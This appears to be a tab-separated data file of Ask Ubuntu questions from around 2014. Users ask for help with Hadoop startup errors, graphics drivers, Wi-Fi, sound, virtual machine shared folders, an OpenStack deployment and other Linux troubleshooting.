459919	error : when start hadoop	i am installed hadoop , following michael noll 's tutorial . when i start name node using as following command , hduser @ arul-pc : /usr/local/hadoop $ sbin/start-all.sh i got response as , this script is deprecated . instead use start-dfs.sh and start-yarn.sh 14/05/03 12:36:43 warn util.nativecodeloader : unable to load native-hadoop library for your platform ... using builtin-java classes where applicable starting namenodes on [ openjdk 64-bit server vm warning : you have loaded library /usr/local/hadoop/lib/native/libhadoop.so.1.0.0 which might have disabled stack guard . the vm will try to fix the stack guard now . it 's highly recommended that you fix the library with 'execstack -c < libfile > ' , or link it with '-z noexecstack ' . localhost ] sed : -e expression # 1 , char 6 : unknown option to `s' -c : unknown cipher type 'cd' 64-bit : ssh : could not resolve hostname 64-bit : name or service not known server : ssh : could not resolve hostname server : name or service not known recommended : ssh : could not resolve hostname recommended : name or service not known hduser @ localhost 's password : link : ssh : could not resolve hostname link : no address associated with hostname openjdk : ssh : could not resolve hostname openjdk : name or service not known library : ssh : could not resolve hostname library : name or service not known stack : ssh : could not resolve hostname stack : name or service not known now . : ssh : could not resolve hostname now . : name or service not known vm : ssh : could not resolve hostname vm : name or service not known guard : ssh : could not resolve hostname guard : name or service not known loaded : ssh : could not resolve hostname loaded : name or service not known that : ssh : could not resolve hostname that : name or service not known the : ssh : could not resolve hostname the : name or service not known with : ssh : could not resolve hostname with : name or service not known fix : ssh : could not resolve hostname fix : name or service not known or : ssh : could not resolve hostname or : name or service not known library : ssh : could not resolve hostname library : name or service not known < libfile > ' , : ssh : could not resolve hostname < libfile > ' , : name or service not known '-z : ssh : could not resolve hostname '-z : name or service not known with : ssh : could not resolve hostname with : name or service not known noexecstack ' . : ssh : could not resolve hostname noexecstack ' . : name or service not known have : ssh : could not resolve hostname have : name or service not known to : ssh : could not resolve hostname to : name or service not known the : ssh : could not resolve hostname the : name or service not known will : ssh : could not resolve hostname will : name or service not known it : ssh : could not resolve hostname it : name or service not known the : ssh : could not resolve hostname the : name or service not known which : ssh : could not resolve hostname which : name or service not known guard . : ssh : could not resolve hostname guard . : name or service not known disabled : ssh : could not resolve hostname disabled : name or service not known might : ssh : could not resolve hostname might : name or service not known vm : ssh : could not resolve hostname vm : name or service not known stack : ssh : could not resolve hostname stack : name or service not known you : ssh : could not resolve hostname you : name or service not known you : ssh : could not resolve hostname you : name or service not known it 's : ssh : could not resolve hostname it 's : name or service not known highly : ssh : could not resolve hostname highly : name or service not known 'execstack : ssh : could not resolve hostname 'execstack : name or service not known have : ssh : could not resolve hostname have : name or service not known try : ssh : could not resolve hostname try : name or service not known fix : ssh : could not resolve hostname fix : name or service not known warning : : ssh : could not resolve hostname warning : : name or service not known please tell me where i did mistake ... when i check configuration folder i saw the below , root @ arul-pc : /usr/local/hadoop/etc/hadoop # ls capacity-scheduler.xml hadoop-metrics2.properties httpfs-site.xml ssl-client.xml.example configuration.xsl hadoop-metrics.properties log4j.properties ssl-server.xml.example container-executor.cfg hadoop-policy.xml mapred-env.cmd yarn-env.cmd core-site.xml hdfs-site.xml mapred-env.sh yarn-env.sh core-site.xml~ hdfs-site.xml~ mapred-queues.xml.template yarn-site.xml hadoop-env.cmd httpfs-env.sh mapred-site.xml.template hadoop-env.sh httpfs-log4j.properties mapred-site.xml.template~ hadoop-env.sh~ httpfs-signature.secret slaves that i added lines as per tutorial said in hadoop-env.sh , core-site.xml , for that files another files has automatically created ending with '~ ' as same as file name . is it normal or it 's an problem ? i open that file using 'gedit ' as , root @ arul-pc : /usr/local/hadoop/etc/hadoop # gedit hadoop-env.sh~ i can see , how to resolve this problem .
459922	problems with rendering after upgrade to ubuntu 14.04 on chromebook acer c720	today i upgraded my chrubuntu ( ubuntu 13.13 ) to ubuntu 14.04 using the do-release-upgrade script . user @ chrubuntu : ~ $ lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 14.04 lts release : 14.04 codename : trusty everything went fine , also the trackball works after a kernel patch . however , the video card is quite slow and i ca n't watch any videos in vlc properly anymore . i think the reason is the missing rendering : with : /usr/lib/nux/unity_support_test -p i get : opengl vendor string : vmware , inc. opengl renderer string : gallium 0.4 on llvmpipe ( llvm 3.4 , 128 bits ) opengl version string : 2.1 mesa 10.1.0 **not software rendered : no** not blacklisted : yes glx fbconfig : yes glx texture from pixmap : yes gl npot or rect textures : yes gl vertex program : yes gl fragment program : yes gl vertex buffer object : yes gl framebuffer object : yes gl version is 1.4+ : yes **unity 3d supported : no** some further information on my system : lspci | grep vga 00:02.0 vga compatible controller : intel corporation haswell-ult integrated graphics controller ( rev 09 ) uname -a linux chrubuntu 3.13.0-24-generic # 46-ubuntu smp thu apr 10 19:11:08 utc 2014 x86_64 x86_64 x86_64 gnu/linux xserver-xorg-video-intel is installed . how can i install mesa dri intel as renderer or fix the problem to watch videos again in fullscreen in vlc ?
459927	virtualbox - how to connect lan computers to windows xp guest	i have software in a windows xp guest that acts as a server . i need to have my lan computers connect to it . is the best way to use a bridged connection ? is there another way ? i 've tried setting up a bridged connection , and so far , it has an internet connection using br0 , but the local computers on the lan can not access it . oh , and i 'm using ubuntu 14.04lts 64-bit , and virtualbox 4.3.10 .
459930	after installing fglrx on ubuntu 14.04 there is no backlight ( hd 5470 ) . is there any workaround ?	i 've installed fglrx driver on my asus k52je laptop with mobility radeon hd 5470 using additional drivers window in ubuntu . i get black screen after reboot . when i hold power button i can barely see shutdown , restart , lock and suspend icons and i am able to choose one . i 've also tried building driver from sources and installing from xorg-edgers . none of those worked . is there any workaround ? edit : it seems i can use external monitor without issues
459931	startup disk creater not loading iso file in 14.04	i have recently upgraded to ubuntu 14.04 , but startup disk creator tool is not loading iso image file . i have tried these 1 and 2 but does n't able to solve this problem . can you please help me in this regard ? thanks in advance .
459933	can not find username folder ( game path )	in the game launcher for minecraft , it tells me that the game directory is in /home/smith/.minecraft , but when i go to home , there is not folder named 'smith ' i am new to ubuntu , and other questions i 've seen i can not understand due to this , even if they do answer my problem . the game runs fine , i just can not find the directory due to the 'smith ' folder being non existent from what i can see .
459934	clicking on gmail from panel indicator opens new window instead of restoring	i 'm running ubuntu 14.04 , and i have gmail installed as a web app . when the app is minimised , and i click on gmail from the panel mail indicator , it opens a new window instead of restoring the minimised window . i know i can click on the minimised window from the launcher to restore it , but should n't the panel indicator do that ? that 's how thunderbird works .
459937	installed fglrx but still showing `` the system is running in low-graphics mode ''	i installed ubuntu 14.04 . it shows the system is running in low-graphics mode message on starting as well as in 'try ubuntu ' option . i entered sudo apt-get install fglrx in the terminal ( ctrl+alt+f1 ) and completed the installation , but the problem still exists . can anyone help me ?
459941	what is systemtap	what is systemtap . i downloaded eclipse when i want to build my project it says make sure systemtap is installed i follow this link it says sudo apt-get install systemtap so what is systemtap ?
459944	docky graphical problems	docky displays a blue bar ( sometimes solid white ) near the edges , and when hiding . screenshots attached . this happens randomly , usually after a suspend , but not always . i 've noticed this does n't happen when i use my nvidia card ( gt740m ) . so it might be an issue specific to the intel hd 4600 card .
459945	how to remove user , group from ubuntu ?	i added group using the command in terminal as , $ sudo addgroup xxx and i add user under that group , $ sudo adduser -- ingroup xxx yyy now , i need to remove the same group as well as user ( s ) , help me ...
459946	can not use cd/dvd-reader at all	i am using ubuntu 12.04 and i have a problem with my cd/dvd reader . manually pressing the button on the laptop gives no response , it worked fine for a while but stopped working a while back . then today somehow it worked again , but only for a minute . i have a cd in there right now , but it does not read it at all . i tried the wodim -- devices command in the terminal but it told me it found 0 accessible drives . i am out of ideas here , appreciate any help . thanks .
459947	ubuntu 12.04 lts does n't recognize full memory ?	i have pentium 4 desktop , intel d915pgn mother board with a full 4 gb of ram , but my ubuntu 12.04 64 bit only recognize 3 gb of ram , do you guys have any suggestion ? thank you
459949	bluetooth not working after upgrade from 12.04 to 14.04	i upgraded from 12.04 to 14.04 . after upgrading the bluetooth is not working . it shows 'no adapters found ' . my laptop is dell inspiron 15 r. how can i get the driver ? ?
459953	how to install ubuntu for phones ?	i want to install ubuntu for phones on my galaxy note 2 ( n7100 ) . how can i do it ?
459954	ubuntu proxy setup with @ in username and password	i have an issue trying to setup my internet with ubuntu . the problem is that i have an @ character in both my username and password and ca n't change them since it is my campus internet login details . is there any way i can work around this so i can use ubuntu 14.04 to access the internet and download the packages directly ?
459961	why is n't my upstart script running on 14.04 ?	i have the following upstart script saved as /etc/init/automount.conf : description `` some description '' start on startup task exec mount -t vboxsf webapps -o rw , dmode=777 , gid=group_id , uid=user_id /var/virtual/some_folder_name where group_id and user_id is some number i took from /etc/passwd previously before i upgraded my ubuntu from 12.10 to 14.04 , this was working . after i upgraded it , i also upgraded the virtual box from 4.3.8 to 4.3.10 . subsequently , i think there was an issue with 4.3.10 . so i downgraded the virtual box back to 4.3.8 . now everything is working with the shared folders . unfortunately , this script is not executed , i believe . the reason is because , the mount is not happening on start up . i can still execute the command without any problem whatsoever . why is n't upstart able to run this any more ? how can i tell what the problem is ?
459962	freetuxtv is installed in 14.04 and not working	i have installed freetuxtv and it went through the prefererd langauge and installed my program list , i like watching outdoor channei , i tried this channel and it did say playing but also had the error message saying that the channel may be dead , but i tried all the channels with the same result , i reinstalled tuxtv and vlc again and also checked my flashplayer to see if it was installed with no joy , hope someone can help thank you
459966	upgrading from ubuntu 11.04 to ubuntu 11.10	i purchased a new laptop dell inpiron 15r 5520 with intel hd 4000 graphics card i am not be to install any new version of ubuntu via the wubi installer . even after the wubi installer would successfully finish . after the reboot my screen would remain blank . i tried going back to previous version and was able to install ubuntu 11.04 64bit . thinking that its a problem with my graphics card drivers which are not present in the newer version . now i want to upgrade my ubuntu . but even though my internet works properly , the update manager says it can not connect to or fetch from the server . i think they have stopped support for ubuntu 11.10 . does anyone have any suggestions as to how should i upgrade my system ?
459970	my ubuntu install cd wrote over entire mac os x . how can i get os x back ?	so i decided to try out ubuntu and burned the install cd . i went through the menu process , and chose a 20gb partition to install ubuntu on . without warning or further confirmations , the ubuntu install proceeded to wipe my entire harddrive . i lost everything on my imac ( not the end of the world as i have a back up ) . my main problem is that i do n't have a way to reinstall mac os x with my original install cd because ubuntu reformated my entire drive and the computer does n't recognise the mac install cd , it just boots automatically in ubuntu . after looking online , i tried to see if could download gparted and see if i could create a partition that would let my computer recognise my install cd . right now i am creating a mac os install usb drive to see if that helps . i am really at a loss and would really appreciate any help or tips or anything to get my mac back on os x .
459972	graphical corruption during install - can not install ubuntu	i am trying to install the latest release of ubuntu , 14.04 . when i boot from usb it starts fine , but when it comes to the installer gui ( with the cursor ) i just see corrupted images . it 's like a checker board of purple and white . the strange thing is that the cursor appears fine and could be moved . tried the same usb on another computer and it works . what could be the problem and how do i install ubuntu on this computer ? i 'm using dual amd 280x gpus .
459973	dell wireless card not detected in ubuntu 14.04	i am a newbie to ubuntu just installed ubuntu gnome 14.04 on my dell inspiron 15 laptop and the wireless card is not detected.. at first hspda dongle wasnt detected too but after manually creating a broadband connection its working . but the wireless icon is not showing up , even the network setting has wired and broadband only output of lspci -k grep | et 00:14.0 usb controller : intel corporation 7 series/c210 series chipset family usb xhci host controller ( rev 04 ) 00:16.0 communication controller : intel corporation 7 series/c210 series chipset family mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation 7 series/c210 series chipset family high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 1 ( rev c4 ) 00:1c.1 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 2 ( rev c4 ) 00:1d.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation hm76 express chipset lpc controller ( rev 04 ) 00 : /1f.2 sata controller : intel corporation 7 series chipset family 6-port sata controller [ ahci mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation 7 series/c210 series chipset family smbus controller ( rev 04 ) 07:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 05 ) 08:00.0 network controller : broadcom corporation bcm43142 802.11b/g/n ( rev 01 )
459976	ubuntu 12.04 zebra tlp 2844 print problem	i am begginer on ubuntu also linux . my company moved from microsoft to ubuntu but i have printing problem.i have zebra tlp 2844 with usb connection ( usb cable 10mt ) i can print test page , excel , document , pdf some times i ca n't print , when i try to print on printer select window i see status some times no pages were found . some times it 's ok. https : //www.dropbox.com/s/6gj5jtwyj362bg1/eet01c~5.png we use sap , crm from web we like to print voucher , i could n't print from web.never ! also i have no pages were found problem with hp laser jet m1212nf mfp , some times i can see ready to print when i test printing voucher i get empty page.i have to use zebra for print voucher . https : //www.dropbox.com/s/vnojkppuwcysm4m/esciub % 7ez.png what should i do for solve this problem.can you help me please ? best regards
459978	recording skype	i have simplescreenrecorder , but it does n't record skype ( like fraps or other screen recorders like that ) . do you know any screen recorder witch record skype ( excuse my english ) ?
459979	operating system not found error . when booting from usb in windows 8 ?	i tried to have a fresh install of latest ubuntu desktop 14.04 in my laptop running on windows 8 using usb iso image . i am careful on all things like : bios settings - external usb flash drive - 1st priority etc . tried directly to boot from usb option as of advanced windows 8 option . still , i am facing the error operating system not found any suggestions , geeks .
459990	unsuccesful upgrade from 13.10 to 14 64bit	i had unsuccessful upgrade to kubuntu 14 , unfortunatly . i does this steps : sudo mkdir -p /media/ubuntu sudo mount /dev/sda1 /media/ubuntu sudo mount -- bind /dev /media/ubuntu/dev sudo mount -- bind /proc /media/ubuntu/proc sudo mount -- bind /sys /media/ubuntu/sys sudo chroot /media/ubuntu but chroot does n't does any changes on my live kubuntu 13.10 dmesg shows somthing like : trap : ... . security ld.xxx < - im writhing from memory . what else can be done ?
459992	hook failed : `` shared-db-relation-changed '' when using openstack in the same system as juju/maas	i have been trying to setup openstack on 14.04 using one machine . i have managed to get maas setup and juju bootstrapped with two machines , one machine to maas and another node that i am trying to setup openstack on . i have read it can be done but i am having problems , basically after reading this https : //help.ubuntu.com/community/ubuntucloudinfrastructure and digging around the internet i found that nova-volume is deprecated so i have been trying to use cinder instead . i have been using these commands : juju deploy mysql -- to 0 juju deploy rabbitmq-server -- to 0 juju deploy -- config=openstack.cfg keystone -- to 0 juju deploy -- config=openstack.cfg nova-cloud-controller -- to 0 juju deploy -- config=openstack.cfg cinder -- to 0 juju deploy nova-compute -- to 0 juju deploy glance -- to 0 juju deploy openstack-dashboard -- to 0 juju add-relation keystone mysql juju add-relation nova-cloud-controller mysql juju add-relation nova-cloud-controller rabbitmq-server juju add-relation nova-cloud-controller glance juju add-relation nova-cloud-controller keystone juju add-relation cinder nova-cloud-controller juju add-relation cinder mysql juju add-relation cinder rabbitmq-server juju add-relation cinder keystone juju add-relation nova-compute mysql juju add-relation nova-compute : amqp rabbitmq-server : amqp juju add-relation nova-compute glance juju add-relation nova-compute nova-cloud-controller juju add-relation glance mysql juju add-relation glance keystone juju add-relation openstack-dashboard keystone juju expose openstack-dashboard juju expose nova-cloud-controller as you can see i have used -- to 0 to say i want them all on the same node . i can get everything started but after linking up all the relations i get this error : hook failed : `` shared-db-relation-changed '' i also in one of the logs a error message saying access denied for that user and that ip . i believe the problem is juju is telling the other services that the ip is 192.168.2.101 but then mysql sets up the users with 127.0.0.1 , meaning they can not connect . any ideas ? other things : this is hopefully going to be used for a private cloud at work , with half a dozen or so instances . i do n't want to use devstack as everyone keeps saying that is n't for production .
459993	vmware windows 7 ( host ) ubuntu 14.04 ( guest ) shared folder wo n't mount	i have a windows 7 with vmware workstation 9 , and i 'm running ubuntu 14.04 on it . i configured the shared folder in the vm/settings menu , and i can see it in the ubuntu when doing vmware-hgfsclient . but there 's nothing inside /mnt folder . i 've tried following this thread : how do i mount shared folders ( win7 host ) in ubuntu ( guest ) using vmware ( tools v6 ) but it still wo n't mount ( after numerous restarts and installing and uninstalling vmware-tools like suggested there ) , there 's still nothing inside /mnt . i 've also tried all sorts of stuff i stumbled upon with open-vm-tools , but nothing worked . i think i do n't have vmhgfs , because modprobe vmhgfs return this : modprobe : fatal : module vmhgfs not found . so hacking /etc/fstab like suggested in many places should n't work anyway , right ? any ideas on how to fix this ?
459994	different performance graphics cards	i have installed windows 8.1 update 1 and ubuntu 14.04 on my laptop hp probook 450 ( with i5 and amd hd 8750 ) . i 'm playing dota 2 . with the same settings in windows and in ubuntu , i get different performance . in windows is all ok , but in ubuntu i have lagged video . in windows i using ccc v13 and in ubuntu v14 . in dota is same properties . where is problem ? i apologize for my english
459998	open libre writer through windows wine program	i 've installed a windows program through playonlinux . the program uses a kind of spreadsheet that can be output to a word processor . when i used this program on windows i would have it output to ms word . but when i give the program the path for libre writer it wo n't open . obviously since it 's a windows program it does n't understand the linux path . any way to get around this ?
459999	always restart when clicking shut down button	when i shutdown the computer ( ubuntu 14.04 ) , it always retart . sometime when i press shutdown in the menu , the computer does not show me the mini window for the shutdown button . how to fix it ? thank you for your help .
460000	problems with dual monitor & resolutions , only in 14.04	i installed ubuntu 14.04 but i am having weird problems with my dual monitors and the resolutions . i also tried xubuntu 14.04 and was having the same problem . i have one 32 inch lg tv with 1920x1080 and one monitor with 1280x1024 resolution . when i first start my 32 inch gets 1360x768 , if i then try to change to 1920x1080 , everythings looks fine and the prompt asking me if i want to keep settings comes up and starts the countdown , but after 2 seconds my computer freezes , and after a few more seconds it reboots itself . however , if i disable my smaller monitor first , i can change to 1920x1080 on my 32 inch without problems , but if i then activate the second monitor the same problem happens again . in xubuntu 14.04 i can change the refresh rate , if i run the 32 inch at 30hz or 50hz everytying works , but i would like to be able to run it at 60hz . i 'm currently running xubuntu 13.10 without this problem . my graphics card is a ati radeon hd 4850 . what is causing this problem , grahpics drivers ? kernel ? xorg ? and how do i solve it ?
460005	lxterminal prompt unwanted characters	i 'm on fresh lubuntu 14.04 installation . i am using lxterminal and this is the prompt i 'm setting through .bashrc file : export ps1= '' \e [ 0 ; 36m $ \w \e [ m '' assume i enter a command up to 15 characters long ( and execute so it registers to history ) ( never mind `` command not found '' ) : $ ~ 012345678901234 012345678901234 : command not found now if i press up arrow i get my command back : $ ~ 012345678901234 and if i press down arrow , i 'm back to the bare prompt : $ ~ the problem the problem starts if i have 16 or more characters to run : $ ~ 0123456789012345 0123456789012345 : command not found now when i press up arrow , i am presented with previous command just fine : $ ~ 0123456789012345 pressing down arrow does n't bring me back to bare prompt , it somehow memorizes 10 characters of the first over 16-characters long command in my history and displays it until anything else is run . it basically becomes my default prompt for the time being . $ ~ 0123456789 i can now press return to get rid of it , or i can run any other command . for the sake of example this : $ ~ 0123456789ls desktop documents downloads music pictures public templates videos what can i do to fix it ? it 's not that big a deal but it 's quite annoying .
460009	how to install drivers to recognize my intel hd 3000 graphics card ? ( on ubuntu 14.04lts )	i have tried installing the drivers from the offcial linux graphics drivers at the intel page ( it was called something like intel hd graphics installer 1.03 ) but apparently it only works for ubuntu 13 or less . so my question is , is there other ways of making my pc use this gpu or do i just wait for intel to release a new installer ?
460010	how to make a lan network without using cables ?	i 'm in a problem now i need to know how to make a lan network using only the wireless card in the laptop to be a server and other laptops to be client for it without using cables or switch just the wireless any idea ?
460011	update problem idle for hours	during updating ubuntu 12.04 lts , it reports an error , and i click on report problem after which the computer turn completely idle , for 4 hours now , i ca n't do anything to deblock it .
460013	how to disable all multi touch or just a few	i have a trackpad that even the right and left click buttons are part of the touch surface . so when i use my middle finger to move the mouse and my point finger to click ( like in a click and drag function for example ) . if two of my finger are touching while one of those fingers click the left button , it has the function of right clicking . this is very annoying . is the anything i can do about this . i do n't know if the above works for this too . i do n't understand the code and how you to do much of this command . is there a way to disable all gestures , but the trackpad still recognizing multi-touch ? thanks in advance . sorry if this is actually covered somewhere else , i 've read a bunch , but do n't think anything is specific to this situation .
460014	nvidia after upgrade 12.04 to 14.04	i have some weird behaviour from nvidia drivers so far . my systemparts that are involved : nvidia gtx 560 two screens ubuntu 14.04 , fresh update from 12.04 , when i execute sudo nvidia-settings and click on apply none of the adjustments are taking place . on closing nvidia-settings i get an error in the terminal : ( nvidia-settings:24231 ) : glib-critical ** : source id 5984 was not found when attempting to remove it the program 'nvidia-settings ' received an x window system error . this probably reflects a bug in the program . the error was 'badvalue ( integer parameter out of range for operation ) ' . ( details : serial 1154 error_code 2 request_code 157 minor_code 25 ) ( note to programmers : normally , x errors are reported asynchronously ; that is , you will receive the error a while after causing it . to debug your program , run it with the -- sync command line option to change this behavior . you can then get a meaningful backtrace from your debugger if you break on the gdk_x_error ( ) function . ) i am not getting any ideas from the logs either : dmesg | grep nvidia [ 22.493961 ] nvidia : module license 'nvidia ' taints kernel . [ 22.498143 ] nvidia : module verification failed : signature and/or required key missing - tainting kernel [ 664.524208 ] init : nvidia-persistenced main process ( 23947 ) terminated with status 1 something reappears allways in xorg.log : [ 33.178 ] ( ii ) nvidia ( gpu-0 ) : display ( samsung syncmaster ( dfp-0 ) ) does not support nvidia [ 33.178 ] ( ii ) nvidia ( gpu-0 ) : 3d vision stereo . well ... i hope anyone can help me ! thank you in advance ! edit : what i tried so far : purging nvidia-drivers and reinstalling them deleting xorg.conf executing nvidia-xconfig edit 2 : just had an idea : launching a game from my steam account . doing that i get : could not find required opengl enty point 'glcolormaskindexedext ' ! either your video card is unsupported , or your opengl driver needs to be updated .
460015	where can i see the text that is displayed during boot ?	during boot , there are three stages : before grub , i have two lines of text flashing telling me that something is not found then there is the grub menu then there is the normal boot process on ubuntu server 12.04 lts , in which log can i find all the text that 's displayed during stage 1 and 3 ?
460019	wifi card on , but wo n't connect to wifi network ; dell inspiron e1505 ( ethernet working )	followed these threads : http : //ubuntuforums.org/showthread.php ? t=2153290 getting wireless to work , dell inspiron e1505 ( bcm4311 ) unable to connect to wifi on a dell inspiron e1505 being new to linux/ubuntu , i was still able to follow the threads above and get the ethernet connection to work . i also got the wifi card turned on but it will not connect with my wifi network . full wifi status readout is available at pastebin.ubuntu.com/7404098 please help . thanks . rfkill list wlan 0 : phy0 : wireless lan soft blocked : no hard blocked : no sudo lshw -c network *-network description : network controller product : bcm4311 802.11b/g wlan vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:0b:00.0 version : 01 width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : driver=b43-pci-bridge latency=0 resources : irq:16 memory : dfdfc000-dfdfffff *-network description : ethernet interface product : bcm4401-b0 100base-tx vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:03:00.0 logical name : eth0 version : 02 serial : 00:15 : c5:21:97:5b size : 10mbit/s capacity : 100mbit/s width : 32 bits clock : 33mhz capabilities : pm bus_master cap_list ethernet physical mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=b44 driverversion=2.0 duplex=half latency=64 link=no multicast=yes port=twisted pair speed=10mbit/s resources : irq:17 memory : df9fe000-df9fffff *-network description : wireless interface physical id : 2 logical name : wlan0 serial : 00:16 : ce:76:01 : ac capabilities : ethernet physical wireless configuration : broadcast=yes driver=b43 driverversion=3.13.0-24-generic firmware=666.2 link=no multicast=yes wireless=ieee 802.11bg
460021	recover a file which has lost 5 minutes ago	is it possible to recover a file which removed 5 minutes ago ? i was working with sqliteman and suddenly it saved an empty database on my database file . it would be greatly appreciated if you suggest any solution . note : i 'm on 14.04
460022	using terminal as a web browser	i 've found that terminal can be used for various purposes . this will be great if i can use it as a web browser . is there any way to use it as a web browser ?
460025	how can i install libreoffice from the package manager to be used with ( oracle ) java installed manually	libreoffice depends on openjdk ( or some other jre ) . i already have oracle 's java 7 installed , and i 'd like libreoffice to use this jre instead . if i attempt to remove openjdk , apt automatically falls back to installing gcj in order to resolve the dependencies of libreoffice , and if i try to ensure neither get installed , apt complains about broken dependencies . i get that the role of the package manager is to ensure this situation does n't occur , but is there any way to have oracle jdk as the only jre on my system and `` inform '' apt about it when installing libreoffice .
460029	how do i change the directory to parallels shared folders/downloads in terminal ?	when i try to change the directory in terminal , it does not recognise the command > cd desktop/parallels shared folders/downloads . nor the commands > cd home and > cd documents . the only directory it recognises is > cd downloads . why is this ?
460031	ubuntu login screen wallpaper missing 14.04	i am new to ubuntu and i tried to change my login screen wallpaper by using terminal according to this : changing login screen wallpaper in ubuntu 13.04 at this time i did not know about ubuntu tweaks . however , i did not get the wallpaper and ended up with a purple dot screen as my login screen . i want to know how to revert back to my default login screen that comes when i first install ubuntu . right now , even when i use ubuntu tweaks , it still does not update and end up with the purple dot screen . please help !
460032	folder permissions install web app	i have changed my home permission to 650 and then i change it to 755 , i put my vagrant www folder in my home . now i do everything such as installing drupal 8 , run laravel 4.0 i found permission error during installation . what should i do ?
460033	ubuntu 13.10 thinkpad t410i system problems and missing graphc device selection in bios after repair	my thinkpad t410i had an overheating problem so i gave it to a certified lenovo store and they changed the mainboard . after the replacement i am facing now two new problems : the graphic device selection in bios/config/display is missing . bios version is the newest ( 1.45 ) both os ( ubuntu 13.10 and windows 7 ) have problems with the graphic windows does not recognize external monitors via vga anymore ubuntu crashes while moving windows if the free nouveau driver is in use the docking station often does not recognize mouse and external monitor if the proprietary nvidia driver is used ubuntu often gets super slow and crashes after waking up from suspend does a hardware replacement has an effect on running os and could require a new os install ? when is the graphic device selection in bios/config/display available and when not ? why is it missing now ? any way to fix this ? do you need more info ? need the laptop for work and writing my bachelor thesis and do n't know what to do at the moment thanks a lot for your help prototyp
460035	`` dummy output '' in ubuntu 14.04	note : i 'm aware there are already questions pertaining to the issue , but those are 13.10 or 12.10 specific and do not solve the issue completely . i 'm using a dell inspiron n5110 . the sound on my ubuntu 14.04 is driving me crazy . it works and does n't work randomly as i turn my pc on . i have followed steps for 13.10 and the answers to this question , but nothing seems to fix the issue . after following the instructions in ubuntu documentation hda intel sound howto . currently i have dell-s14 in the alsa-base.conf file . i can hear sound from my laptop speakers after i saved and restarted alsa , but lost sound after rebooting . changing it from dell-s14 to dell-vostro-3500 did n't work . running pulseaudio -d gives daemon startup failed . cat /proc/asound/card0/codec* | grep codec gives codec : idt 92hd87b1/3 and here 's the section matching my codec in the hd-audio-models.txt `stac92hd83* =========== ref reference board mic-ref reference board with power management for ports dell-s14 dell laptop dell-vostro-3500 dell vostro 3500 laptop hp-dv7-4000 hp dv-7 4000 auto bios setup ( default ) ` pulseaudio -vvv gives : i : [ pulseaudio ] main.c : setrlimit ( rlimit_nice , ( 31 , 31 ) ) failed : operation not permitted d : [ pulseaudio ] core-rtclock.c : timer slack is set to 50 us . d : [ pulseaudio ] core-util.c : realtimekit worked . i : [ pulseaudio ] core-util.c : successfully gained nice level -11 . i : [ pulseaudio ] main.c : this is pulseaudio 4.0 d : [ pulseaudio ] main.c : compilation host : x86_64-pc-linux-gnu d : [ pulseaudio ] main.c : compilation cflags : -g -o2 -fstack-protector -- param=ssp-buffer-size=4 -wformat -werror=format-security -wall -w -wextra -pipe -wno-long-long -wno-overlength-strings -wunsafe-loop-optimizations -wundef -wformat=2 -wlogical-op -wsign-compare -wformat-security -wmissing-include-dirs -wformat-nonliteral -wpointer-arith -winit-self -wdeclaration-after-statement -wfloat-equal -wmissing-prototypes -wredundant-decls -wmissing-declarations -wmissing-noreturn -wshadow -wendif-labels -wcast-align -wstrict-aliasing -wwrite-strings -wno-unused-parameter -ffast-math -wp , -d_fortify_source=2 -fno-common -fdiagnostics-show-option d : [ pulseaudio ] main.c : running on host : linux x86_64 3.13.0-24-generic # 47-ubuntu smp fri may 2 23:30:00 utc 2014 d : [ pulseaudio ] main.c : found 4 cpus . i : [ pulseaudio ] main.c : page size is 4096 bytes d : [ pulseaudio ] main.c : compiled with valgrind support : no d : [ pulseaudio ] main.c : running in valgrind mode : no d : [ pulseaudio ] main.c : running in vm : no d : [ pulseaudio ] main.c : optimized build : yes d : [ pulseaudio ] main.c : fastpath defined , only fast path asserts disabled . i : [ pulseaudio ] main.c : machine id is 41cf9ca67be1059b2fa9e2fd533d698b . i : [ pulseaudio ] main.c : session id is c2 . i : [ pulseaudio ] main.c : using runtime directory /run/user/1000/pulse . i : [ pulseaudio ] main.c : using state directory /home/me/.config/pulse . i : [ pulseaudio ] main.c : using modules directory /usr/lib/pulse-4.0/modules . i : [ pulseaudio ] main.c : running in system mode : no e : [ pulseaudio ] pid.c : daemon already running . e : [ pulseaudio ] main.c : pa_pid_file_create ( ) failed . update after i added both dell-vostro-3500 and dell-s14 to the alsa-base.conf and restarted my pc and logged in , there was no sound tray icon , i logged ot and logged in , voila ! ! i got the sound back ! ! i still have sound working after rebooting again ! !
460037	ubuntu 14.04 maxon bp3-ext wireless modem	i 'm having trouble with the telstra branded maxon bp3-ext . the modem works in xp , i 'm using the correct apn , username , and password . from sifting through forums the modem apparently worked well on ubuntu 9.10 all the guides i 've seen to get it going require commands that are n't included in 14.04 dmesg does show the modem being registered correctly as per the guides i 've seen . not sure where to go from here . any help is appreciated ! update this blog documents the efforts of the guy who added the patch for using the option driver back 2008 ... .
460041	do i have to backup the boot partition table with partimage in order to make a full backup ?	i am new to linux and quite often break it . now with partimage and the rescuecd of it , i dumped my linux file system partition on sda2 to sda4 partition . in the install process of linux mint , i created a partition for the boot sector ( sda1 ) . in the manual of partimage ( http : //www.partimage.org/partimage-manual_partition_image_internals # how_are_the_partitions_read.2fwritten ) it is said that partimage also backups the boot sector . does that mean that i do n't have to explicitly backup the sda1 boot sector partition also ? i just wanted to make that sure for me . thanks in advance !
